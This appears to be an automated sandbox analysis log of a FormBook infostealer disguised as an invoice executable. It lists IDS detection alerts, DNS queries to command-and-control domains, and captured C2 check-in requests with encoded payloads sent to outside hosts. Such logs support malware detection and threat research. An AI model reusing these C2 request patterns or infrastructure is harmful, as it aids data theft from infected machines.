                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49995 -> 46.38.243.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 23.167.152.41:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49998 -> 46.38.243.234:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49998 -> 46.38.243.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50016 -> 31.31.198.145:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49955 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 45.79.252.94:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49934 -> 216.40.34.41:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49934 -> 216.40.34.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49923 -> 216.40.34.41:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49854 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49854 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 31.31.198.145:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49996 -> 46.38.243.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 45.79.252.94:80
                Source: Joe Sandbox ViewIP Address: 203.161.49.193 203.161.49.193
                Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
                Source: Joe Sandbox ViewASN Name: AS-REGRU AS-REGRU
                Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
                Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0044289D InternetQueryDataAvailable,InternetReadFile,0_2_0044289D
                Source: global trafficHTTP traffic detected: GET /q97g/?UTJ0bhC=KK21uW0xHvorSk2vqcKD6wcSSPO+hyXQDk2L0YWF9dCKmUutgv1vRlzTvSsha0PsjgX1XZeK5J0dHVwIQm2B9BwzLeItohU7wCU4mTfCSECcS++9DVG9zxqTCFVXtteVmg==&Pt=fDlHoNWP0RBd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.regents.healthConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /tizt/?UTJ0bhC=qmi+mqOOYFdY+IQEwG2FxqFWHTg0Nvqmcf68l9cfSo4s6etqUFq9dTq1GSeGSZSg4PJsoSCL3HUy+ahRuGvxg8Ma1a6j66cDsm0o40uJcJz1cVDMGreiQH32Lp7znSrnRg==&Pt=fDlHoNWP0RBd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.73613.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /n54u/?UTJ0bhC=ulF5vHaDZay2YbeuiqBK2WYi+52Jh6JWqdjuqGF6KuylXEStCuZI2HnnajvzLLcIwfuU3NLav5OgU7G/d2tti5seczbyW8/HcZoVhAsi6mpRcK6hsQ2VCyFx3Djg7K8V+w==&Pt=fDlHoNWP0RBd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.eco-tops.websiteConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /8u3q/?UTJ0bhC=cm4ubz77/lIwMrhkdRh+pZgL/Bl5XR/XxQMTOGkT00YioQcuvl4ad7FbuK2ZVTUxGoXbXPFIPc1cKkfmvUrJch/nk290kcPG1JSPbhB/GQRlqu+N9s0n8p9+2HNGTNszmQ==&Pt=fDlHoNWP0RBd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.astrext.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /f83s/?Pt=fDlHoNWP0RBd&UTJ0bhC=VieK6f8ncaDfGPivzEEx/UZGk95Gg2UmvQp6RJCzQOx2HiGD45aR4i1hBpXETM6WRWeDEM4UlZawI5DKshaxB7d7bPT0ms8iN9yo/alCEGhGDXP2xLsxmillvf5/o1Iesw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.newhopetoday.appConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /gnm5/?UTJ0bhC=ti6/QOgt3F3Nl8C8p5prtjMaW6Y6IMW9lnWD5iRmif1oLulHgQhjY9iWeVbvuaIrm8dL1NajAOuvhk5PRRHWg3CbVnS8VxpDrxjuQQLZCEWAlJrEzJ1sdVkNA6M29CxpkA==&Pt=fDlHoNWP0RBd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.binacamasala.comConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /zdtk/?UTJ0bhC=CZnbO61oB8I0t5jp9Yjra7+H6pVn9XqOl0/1mbdze6wgsABtqXuHlKk0QinpfTYx1CmGDnkfwpenOsZSDrrPpuKT49SBu0EMo/Pb2gUHZetqgGuH1mNT0tuZ4b1AatRTdQ==&Pt=fDlHoNWP0RBd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.dlion.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /uwg4/?UTJ0bhC=FrIvBq+7M+fO4hFqHVkj/h0MgBQBdbkSyhygt3ownjEqtb7lfSc+JwlWQ4K/WGS3VMA0fSxFYiNdEScU0GRMxZDLyu9hbg86BnUYxIHc13WjzD0wj4NYGBX3EB3iY/brcg==&Pt=fDlHoNWP0RBd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.bioart.buzzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /4i55/?Pt=fDlHoNWP0RBd&UTJ0bhC=u0M432eX/xZzvajH7Zn4oj16d1M/QQvp1keQ4HSaLqVhf5mFg72lw0bKX+EdY5KNk4RXhc2Czo9qgjxQ7/1U7lrsyz5+vZkdL+U3wCm0CZUZdVO/eyd7jrB+924QONEljg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.06753.photoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /tgvj/?UTJ0bhC=JzeZZokphZySGFVIg3fW0H54lk8TDwrrWR2sEOIWidbOqUuKdhJmv9JQEF9O1RD5XyTbq6Omqzt9QHi6LTaoobUAF4YLNuHihjnBZMeTneWuYVNORWnArhJV2H75YPAzvg==&Pt=fDlHoNWP0RBd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.gucciqueen.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /p39a/?Pt=fDlHoNWP0RBd&UTJ0bhC=NYM041vNjejJmgmdhSmYVhxa0+fvP9BrXtGCCHxlIJ8IspgLPDvRAlXhNJfLJHdGPUuKZVGM9QJ5KO5zmQZa2t3P5lFBsDeA2Uq7kE2QIl2fKsXQslF4XsSGUXNQZJSmUg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.premium303max.restConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)
                Source: global trafficDNS traffic detected: DNS query: www.regents.health
                Source: global trafficDNS traffic detected: DNS query: www.73613.shop
                Source: global trafficDNS traffic detected: DNS query: www.eco-tops.website
                Source: global trafficDNS traffic detected: DNS query: www.astrext.info
                Source: global trafficDNS traffic detected: DNS query: www.newhopetoday.app
                Source: global trafficDNS traffic detected: DNS query: www.binacamasala.com
                Source: global trafficDNS traffic detected: DNS query: www.dlion.net
                Source: global trafficDNS traffic detected: DNS query: www.bioart.buzz
                Source: global trafficDNS traffic detected: DNS query: www.06753.photo
                Source: global trafficDNS traffic detected: DNS query: www.gucciqueen.shop
                Source: global trafficDNS traffic detected: DNS query: www.premium303max.rest
                Source: global trafficDNS traffic detected: DNS query: www.mnpl.online
                Source: global trafficDNS traffic detected: DNS query: www.locuramagica.online
                Source: unknownHTTP traffic detected: POST /tizt/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflateHost: www.73613.shopContent-Type: application/x-www-form-urlencodedConnection: closeCache-Control: max-age=0Content-Length: 208Origin: http://www.73613.shopReferer: http://www.73613.shop/tizt/User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36Data Raw: 55 54 4a 30 62 68 43 3d 6e 6b 4b 65 6c 61 43 64 58 55 64 73 2b 71 4d 38 73 51 7a 30 67 37 68 76 51 79 31 75 45 65 79 45 49 39 75 74 6e 2f 67 59 66 59 41 74 35 50 56 77 42 7a 69 53 62 30 76 6f 4b 6e 36 31 5a 75 33 73 36 75 59 53 6b 6a 2f 7a 34 57 30 68 6f 62 4e 62 31 54 58 61 6f 66 46 74 31 37 2f 34 77 63 6b 65 67 68 6b 4a 36 51 2b 51 65 2f 6e 71 56 53 33 55 48 37 53 71 4d 7a 4f 59 41 71 72 38 74 42 71 76 46 6b 4d 71 4e 4b 75 5a 6f 38 74 64 2f 50 6c 69 6f 45 63 75 70 66 66 47 33 6c 32 63 52 6a 62 46 4b 73 74 6d 64 4a 61 39 72 66 4e 76 56 66 7a 30 5a 64 34 46 70 2f 72 48 5a 4c 63 69 34 45 73 52 52 61 6b 45 73 71 73 3d Data Ascii: UTJ0bhC=nkKelaCdXUds+qM8sQz0g7hvQy1uEeyEI9utn/gYfYAt5PVwBziSb0voKn61Zu3s6uYSkj/z4W0hobNb1TXaofFt17/4wckeghkJ6Q+Qe/nqVS3UH7SqMzOYAqr8tBqvFkMqNKuZo8td/PlioEcupffG3l2cRjbFKstmdJa9rfNvVfz0Zd4Fp/rHZLci4EsRRakEsqs=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Tue, 10 Dec 2024 15:24:07 GMTTransfer-Encoding: chunkedConnection: closeX-Powered-By: 3.2.1Access-Control-Allow-Origin: *Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONSData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Tue, 10 Dec 2024 15:24:10 GMTTransfer-Encoding: chunkedConnection: closeX-Powered-By: 3.2.1Access-Control-Allow-Origin: *Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONSData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Tue, 10 Dec 2024 15:24:13 GMTTransfer-Encoding: chunkedConnection: closeX-Powered-By: 3.2.1Access-Control-Allow-Origin: *Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONSData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Tue, 10 Dec 2024 15:24:16 GMTTransfer-Encoding: chunkedConnection: closeX-Powered-By: 3.2.1Access-Control-Allow-Origin: *Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONSData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 15:24:16 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 15:24:18 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 15:24:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 15:24:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
